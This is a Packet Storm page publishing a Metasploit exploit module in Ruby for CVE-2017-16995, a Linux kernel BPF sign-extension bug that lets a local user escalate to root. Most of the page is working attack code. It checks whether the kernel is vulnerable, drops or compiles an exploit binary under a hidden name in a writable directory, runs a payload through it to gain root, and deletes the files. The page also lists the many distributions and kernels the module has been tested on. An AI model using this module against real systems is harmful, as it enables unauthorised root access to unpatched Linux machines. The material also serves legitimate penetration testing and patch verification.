exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Linux BPF Sign Extension Local Privilege Escalation

Linux BPF Sign Extension Local Privilege Escalation
Posted Jul 19, 2018
Authored by h00die, Jann Horn, vnik, rlarabee, bleidl, bcoles | Site metasploit.com

Linux kernel versions prior to 4.14.8 utilize the Berkeley Packet Filter (BPF) which contains a vulnerability where it may improperly perform signing for an extension. This can be utilized to escalate privileges. The target system must be compiled with BPF support and must not have kernel.unprivileged_bpf_disabled set to 1. This Metasploit module has been tested successfully on many different kernels.

tags | exploit, kernel
systems | linux
advisories | CVE-2017-16995
SHA-256 | 3a7fa7070c41ddc4726fd312fb66650ad5d4cd33a694060cfd4542206f2d48f1

Linux BPF Sign Extension Local Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = GreatRanking

include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Post::Linux::Kernel
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Linux BPF Sign Extension Local Privilege Escalation',
'Description' => %q{
Linux kernel prior to 4.14.8 utilizes the Berkeley Packet Filter (BPF)
which contains a vulnerability where it may improperly perform sign
extension. This can be utilized to escalate privileges.

The target system must be compiled with BPF support and must not have
kernel.unprivileged_bpf_disabled set to 1.

This module has been tested successfully on:

Debian 9.0 kernel 4.9.0-3-amd64;
Deepin 15.5 kernel 4.9.0-deepin13-amd64;
ElementaryOS 0.4.1 kernel 4.8.0-52-generic;
Fedora 25 kernel 4.8.6-300.fc25.x86_64;
Fedora 26 kernel 4.11.8-300.fc26.x86_64;
Fedora 27 kernel 4.13.9-300.fc27.x86_64;
Gentoo 2.2 kernel 4.5.2-aufs-r;
Linux Mint 17.3 kernel 4.4.0-89-generic;
Linux Mint 18.0 kernel 4.8.0-58-generic;
Linux Mint 18.3 kernel 4.13.0-16-generic;
Mageia 6 kernel 4.9.35-desktop-1.mga6;
Manjero 16.10 kernel 4.4.28-2-MANJARO;
Solus 3 kernel 4.12.7-11.current;
Ubuntu 14.04.1 kernel 4.4.0-89-generic;
Ubuntu 16.04.2 kernel 4.8.0-45-generic;
Ubuntu 16.04.3 kernel 4.10.0-28-generic;
Ubuntu 17.04 kernel 4.10.0-19-generic;
ZorinOS 12.1 kernel 4.8.0-39-generic.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jann Horn', # Discovery
'bleidl', # Discovery and get-rekt-linux-hardened.c exploit
'vnik', # upstream44.c exploit
'rlarabee', # cve-2017-16995.c exploit
'h00die', # Metasploit
'bcoles' # Metasploit
],
'DisclosureDate' => 'Nov 12 2017',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'AKA', 'get-rekt-linux-hardened.c' ],
[ 'AKA', 'upstream44.c' ],
[ 'BID', '102288' ],
[ 'CVE', '2017-16995' ],
[ 'EDB', '44298' ],
[ 'EDB', '45010' ],
[ 'URL', 'https://github.com/rlarabee/exploits/blob/master/cve-2017-16995/cve-2017-16995.c' ],
[ 'URL', 'https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c' ],
[ 'URL', 'http://cyseclabs.com/pub/upstream44.c' ],
[ 'URL', 'https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor' ],
[ 'URL', 'https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html' ],
[ 'URL', 'https://www.debian.org/security/2017/dsa-4073' ],
[ 'URL', 'https://usn.ubuntu.com/3523-2/' ],
[ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-16995.html' ],
[ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1454' ],
[ 'URL', 'http://openwall.com/lists/oss-security/2017/12/21/2'],
[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=95a762e2c8c942780948091f8f2a4f32fce1ac6f' ]
],
'DefaultTarget' => 0))
register_options [
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end

def base_dir
datastore['WritableDir'].to_s
end

def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
end

def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end

def upload_and_compile(path, data)
upload "#{path}.c", data

gcc_cmd = "gcc -o #{path} #{path}.c"
if session.type.eql? 'shell'
gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
end
output = cmd_exec gcc_cmd
rm_f "#{path}.c"

unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile. Set COMPILE False to upload a pre-compiled executable."
end

cmd_exec "chmod +x #{path}"
end

def exploit_data(file)
path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-16995', file
fd = ::File.open path, 'rb'
data = fd.read fd.stat.size
fd.close
data
end

def live_compile?
return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')

if has_gcc?
vprint_good 'gcc is installed'
return true
end

unless datastore['COMPILE'].eql? 'Auto'
fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
end
end

def check
arch = kernel_hardware
unless arch.include? 'x86_64'
vprint_error "System architecture #{arch} is not supported"
return CheckCode::Safe
end
vprint_good "System architecture #{arch} is supported"

if unprivileged_bpf_disabled?
vprint_error 'Unprivileged BPF loading is not permitted'
return CheckCode::Safe
end
vprint_good 'Unprivileged BPF loading is permitted'

release = kernel_release
if Gem::Version.new(release.split('-').first) > Gem::Version.new('4.14.11') ||
Gem::Version.new(release.split('-').first) < Gem::Version.new('4.0')
vprint_error "Kernel version #{release} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Kernel version #{release} appears to be vulnerable"

CheckCode::Appears
end

def exploit
unless check == CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target not vulnerable! punt!'
end

if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end

unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end

# Upload exploit executable
executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, exploit_data('exploit.c')
else
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx executable_path, exploit_data('exploit.out')
end

# Upload payload executable
payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
upload_and_chmodx payload_path, generate_payload_exe

# Launch exploit
print_status 'Launching exploit ...'
output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path} "
output.each_line { |line| vprint_status line.chomp }
print_status "Cleaning up #{payload_path} and #{executable_path} ..."
rm_f executable_path
rm_f payload_path
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close